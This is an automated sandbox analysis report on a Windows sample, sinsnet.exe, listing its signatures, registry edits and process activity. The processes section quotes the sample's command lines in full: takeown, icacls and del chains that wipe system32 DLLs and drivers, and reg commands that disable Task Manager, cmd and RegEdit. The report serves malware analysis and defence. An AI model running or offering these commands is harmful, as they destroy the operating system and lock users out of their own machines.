Malware Analysis Report

2024-11-16 12:47

Sample ID 240806-lxrnmawdrl
Target sinsnet.exe
SHA256 cbb96bd03450e53027296986e90377fd66f623ec826b515a257308f8c3eff2c7
Tags
discovery evasion exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

cbb96bd03450e53027296986e90377fd66f623ec826b515a257308f8c3eff2c7

Threat Level: Likely malicious

The file sinsnet.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion exploit

Possible privilege escalation attempt

Disables cmd.exe use via registry modification

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Modifies file permissions

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 09:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 09:55

Reported

2024-08-06 09:57

Platform

win7-20240704-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2852 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2852 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2852 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1968 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2896 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2896 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2896 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1968 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2896 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2896 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2896 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1968 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2852 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2852 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2852 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1968 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wininit.exe

Network

N/A

Files

memory/1968-0-0x000000013F830000-0x000000013F9D1000-memory.dmp

memory/1304-2-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

memory/1924-4-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1968-5-0x000000013F830000-0x000000013F9D1000-memory.dmp

memory/1636-6-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2680-7-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2004-8-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1148-9-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1956-10-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/748-11-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/340-12-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2472-13-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2932-14-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2496-15-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1340-16-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1820-17-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1584-18-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/932-19-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2400-20-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2100-21-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1128-22-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1804-23-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2332-24-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/2720-25-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1992-26-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1680-27-0x000007FEF7050000-0x000007FEF709C000-memory.dmp

memory/1968-28-0x000000013F830000-0x000000013F9D1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 09:55

Reported

2024-08-06 09:57

Platform

win10v2004-20240802-en

Max time kernel

129s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
